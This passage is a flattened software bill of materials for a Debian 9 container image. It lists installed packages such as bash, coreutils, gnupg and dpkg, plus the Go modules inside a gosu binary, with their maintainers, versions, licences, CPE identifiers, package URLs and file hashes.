sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/base-passwd/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/base-passwd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 229 Matthias Klose <doko@debian.org> bash 4.4-5 GPL-3.0-only cpe:2.3:a:bash:bash:4.4-5:*:*:*:*:*:*:* pkg:deb/debian/bash@4.4-5?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/bash/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bash.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bash.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 5798 Debian util-linux Maintainers <ah-util-linux@debian.org> bsdutils 1:2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:bsdutils:bsdutils:1\:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/bsdutils@1:2.29.2-1+deb9u1?arch=amd64&upstream=util-linux%402.29.2-1+deb9u1&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/bsdutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/bsdutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 238 util-linux 2.29.2-1+deb9u1 Michael Stone <mstone@debian.org> coreutils 8.26-3 GPL-3.0-only cpe:2.3:a:coreutils:coreutils:8.26-3:*:*:*:*:*:*:* pkg:deb/debian/coreutils@8.26-3?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/coreutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/coreutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 15103 Gerrit Pape <pape@smarden.org> dash 0.5.8-2.4 GPL cpe:2.3:a:dash:dash:0.5.8-2.4:*:*:*:*:*:*:* pkg:deb/debian/dash@0.5.8-2.4?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/dash/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dash.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 204 Debconf Developers <debconf-devel@lists.alioth.debian.org> debconf 1.5.61 BSD-2-Clause cpe:2.3:a:debconf:debconf:1.5.61:*:*:*:*:*:*:* pkg:deb/debian/debconf@1.5.61?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debconf/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debconf.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debconf.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 558 Debian Release Team <packages@release.debian.org> debian-archive-keyring 2017.5+deb9u2 GPL cpe:2.3:a:debian-archive-keyring:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/debian-archive-keyring@2017.5+deb9u2?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:debian-archive-keyring:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive_keyring:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive_keyring:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian-archive:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian-archive:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian_archive:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian:debian-archive-keyring:2017.5\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:debian:debian_archive_keyring:2017.5\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debian-archive-keyring/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debian-archive-keyring.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debian-archive-keyring.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 189 Clint Adams <clint@debian.org> debianutils 4.8.1.1 GPL cpe:2.3:a:debianutils:debianutils:4.8.1.1:*:*:*:*:*:*:* pkg:deb/debian/debianutils@4.8.1.1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/debianutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/debianutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 213 Santiago Vila <sanvila@debian.org> diffutils 1:3.5-3 GFDL GPL cpe:2.3:a:diffutils:diffutils:1\:3.5-3:*:*:*:*:*:*:* pkg:deb/debian/diffutils@1:3.5-3?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/diffutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/diffutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1327 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> dirmngr 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:dirmngr:dirmngr:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/dirmngr@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/dirmngr/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/dirmngr.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1088 gnupg2 Dpkg Developers <debian-dpkg@lists.debian.org> dpkg 1.18.25 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later public-domain-md5 public-domain-s-s-d cpe:2.3:a:dpkg:dpkg:1.18.25:*:*:*:*:*:*:* pkg:deb/debian/dpkg@1.18.25?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/dpkg/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dpkg.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/dpkg.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 6778 Theodore Y. Ts'o <tytso@mit.edu> e2fslibs 1.43.4-2+deb9u2 GPL-2.0-only LGPL-2.0-only cpe:2.3:a:e2fslibs:e2fslibs:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/e2fslibs@1.43.4-2+deb9u2?arch=amd64&upstream=e2fsprogs&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/e2fslibs/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fslibs:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 450 e2fsprogs Theodore Y. Ts'o <tytso@mit.edu> e2fsprogs 1.43.4-2+deb9u2 GPL-2.0-only LGPL-2.0-only cpe:2.3:a:e2fsprogs:e2fsprogs:1.43.4-2\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/e2fsprogs@1.43.4-2+deb9u2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/e2fsprogs/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fsprogs.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/e2fsprogs.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 4027 Andreas Metzler <ametzler@debian.org> findutils 4.6.0+git+20161106-2 GFDL-1.3-only GPL-3.0-only cpe:2.3:a:findutils:findutils:4.6.0\+git\+20161106-2:*:*:*:*:*:*:* pkg:deb/debian/findutils@4.6.0+git+20161106-2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/findutils/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/findutils.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1854 Debian GCC Maintainers <debian-gcc@lists.debian.org> gcc-6-base 6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only cpe:2.3:a:gcc-6-base:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/gcc-6-base@6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:gcc-6-base:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6_base:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6_base:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc-6:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc-6:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc_6:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc:gcc-6-base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:gcc:gcc_6_base:6.3.0-18\+deb9u1:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gcc-6-base:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 209 gcc-6 github.com/opencontainers/runc v1.0.1 cpe:2.3:a:opencontainers:runc:v1.0.1:*:*:*:*:*:*:* pkg:golang/github.com/opencontainers/runc@v1.0.1 go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu x86_64 go1.16.7 h1:G18PGckGdAm3yVQRWDVQ1rLSLntiniKJ0cNRT2Tm5gs= github.com/tianon/gosu github.com/tianon/gosu (devel) cpe:2.3:a:tianon:gosu:\(devel\):*:*:*:*:*:*:* pkg:golang/github.com/tianon/gosu@(devel) go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu x86_64 go1.16.7 github.com/tianon/gosu Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gnupg 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:gnupg:gnupg:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gnupg@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/gnupg/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2093 gnupg2 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gnupg-agent 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:gnupg-agent:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gnupg-agent@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:gnupg-agent:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg_agent:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg_agent:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg:gnupg-agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* cpe:2.3:a:gnupg:gnupg_agent:2.1.18-8\~deb9u4:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/gnupg-agent/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg-agent.conffiles sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/gnupg-agent.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1362 gnupg2 golang.org/x/sys v0.0.0-20210817142637-7d9622a276b7 cpe:2.3:a:golang:x\/sys:v0.0.0-20210817142637-7d9622a276b7:*:*:*:*:*:*:* pkg:golang/golang.org/x/sys@v0.0.0-20210817142637-7d9622a276b7 go-module-binary-cataloger go GolangBinMetadata go-module sha256:0305f2b14826a228defa3526b1fcd8af7291315d19e9e8dea531eb8725f1c369 /usr/local/bin/gosu x86_64 go1.16.7 h1:lQ8Btl/sJr2+f4ql7ffKUKfnV0BsgsICvm0oEeINAQY= github.com/tianon/gosu Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> gpgv 2.1.18-8~deb9u4 BSD-3-Clause Expat GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later RFC-Reference TinySCHEME permissive cpe:2.3:a:gpgv:gpgv:2.1.18-8\~deb9u4:*:*:*:*:*:*:* pkg:deb/debian/gpgv@2.1.18-8~deb9u4?arch=amd64&upstream=gnupg2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gpgv/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gpgv.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 721 gnupg2 Anibal Monsalve Salazar <anibal@debian.org> grep 2.27-2 GPL-3.0-only GPL-3.0-or-later cpe:2.3:a:grep:grep:2.27-2:*:*:*:*:*:*:* pkg:deb/debian/grep@2.27-2?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/grep/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/grep.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1131 Bdale Garbee <bdale@gag.com> gzip 1.6-5+deb9u1 GPL cpe:2.3:a:gzip:gzip:1.6-5\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/gzip@1.6-5+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gzip/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/gzip.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 230 Debian Hostname Team <hostname-devel@lists.alioth.debian.org> hostname 3.18+b1 GPL-2.0-only cpe:2.3:a:hostname:hostname:3.18\+b1:*:*:*:*:*:*:* pkg:deb/debian/hostname@3.18+b1?arch=amd64&upstream=hostname%403.18&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/hostname/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/hostname.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 47 hostname 3.18 Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> init-system-helpers 1.48 BSD-3-Clause GPL-2.0-only GPL-2.0-or-later cpe:2.3:a:init-system-helpers:init-system-helpers:1.48:*:*:*:*:*:*:* pkg:deb/debian/init-system-helpers@1.48?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:init-system-helpers:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system_helpers:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system_helpers:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init-system:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init-system:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init_system:init_system_helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init:init-system-helpers:1.48:*:*:*:*:*:*:* cpe:2.3:a:init:init_system_helpers:1.48:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/init-system-helpers/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/init-system-helpers.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 131 Anibal Monsalve Salazar <anibal@debian.org> libacl1 2.2.52-3+b1 GPL LGPL-2.1-only cpe:2.3:a:libacl1:libacl1:2.2.52-3\+b1:*:*:*:*:*:*:* pkg:deb/debian/libacl1@2.2.52-3+b1?arch=amd64&upstream=acl%402.2.52-3&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libacl1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libacl1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 62 acl 2.2.52-3 APT Development Team <deity@lists.debian.org> libapt-pkg5.0 1.4.11 GPL-2.0-only GPLv2+ cpe:2.3:a:libapt-pkg5.0:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* pkg:deb/debian/libapt-pkg5.0@1.4.11?arch=amd64&upstream=apt&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libapt-pkg5.0:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt_pkg5.0:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt_pkg5.0:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt:libapt-pkg5.0:1.4.11:*:*:*:*:*:*:* cpe:2.3:a:libapt:libapt_pkg5.0:1.4.11:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libapt-pkg5.0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libapt-pkg5.0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3056 apt Debian GnuPG-Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> libassuan0 2.4.3-2 GAP GAP~FSF GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later cpe:2.3:a:libassuan0:libassuan0:2.4.3-2:*:*:*:*:*:*:* pkg:deb/debian/libassuan0@2.4.3-2?arch=amd64&upstream=libassuan&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libassuan0/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libassuan0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 106 libassuan Anibal Monsalve Salazar <anibal@debian.org> libattr1 1:2.4.47-2+b2 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libattr1:libattr1:1\:2.4.47-2\+b2:*:*:*:*:*:*:* pkg:deb/debian/libattr1@1:2.4.47-2+b2?arch=amd64&upstream=attr%401:2.4.47-2&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libattr1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libattr1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 42 attr 1:2.4.47-2 Laurent Bigonville <bigon@debian.org> libaudit-common 1:2.6.7-2 GPL-1.0-only GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libaudit-common:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* pkg:deb/debian/libaudit-common@1:2.6.7-2?arch=all&upstream=audit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libaudit-common:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit_common:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit_common:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit:libaudit-common:1\:2.6.7-2:*:*:*:*:*:*:* cpe:2.3:a:libaudit:libaudit_common:1\:2.6.7-2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libaudit-common/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit-common.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit-common.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 30 audit Laurent Bigonville <bigon@debian.org> libaudit1 1:2.6.7-2 GPL-1.0-only GPL-2.0-only LGPL-2.1-only cpe:2.3:a:libaudit1:libaudit1:1\:2.6.7-2:*:*:*:*:*:*:* pkg:deb/debian/libaudit1@1:2.6.7-2?arch=amd64&upstream=audit&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libaudit1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libaudit1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 150 audit Debian util-linux Maintainers <ah-util-linux@debian.org> libblkid1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libblkid1:libblkid1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libblkid1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libblkid1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libblkid1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 367 util-linux Guillem Jover <guillem@debian.org> libbsd0 0.8.3-1+deb9u1 BSD-2-Clause BSD-2-Clause BSD-2-clause-author BSD-2-clause-verbatim BSD-3-Clause BSD-3-clause-Peter-Wemm BSD-3-clause-Regents BSD-4-clause-Christopher-G-Demetriou BSD-4-clause-Niels-Provos BSD-5-clause-Peter-Wemm Beerware Expat ISC ISC-Original public-domain public-domain-Colin-Plumb cpe:2.3:a:libbsd0:libbsd0:0.8.3-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libbsd0@0.8.3-1+deb9u1?arch=amd64&upstream=libbsd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libbsd0/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libbsd0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 159 libbsd Anibal Monsalve Salazar <anibal@debian.org> libbz2-1.0 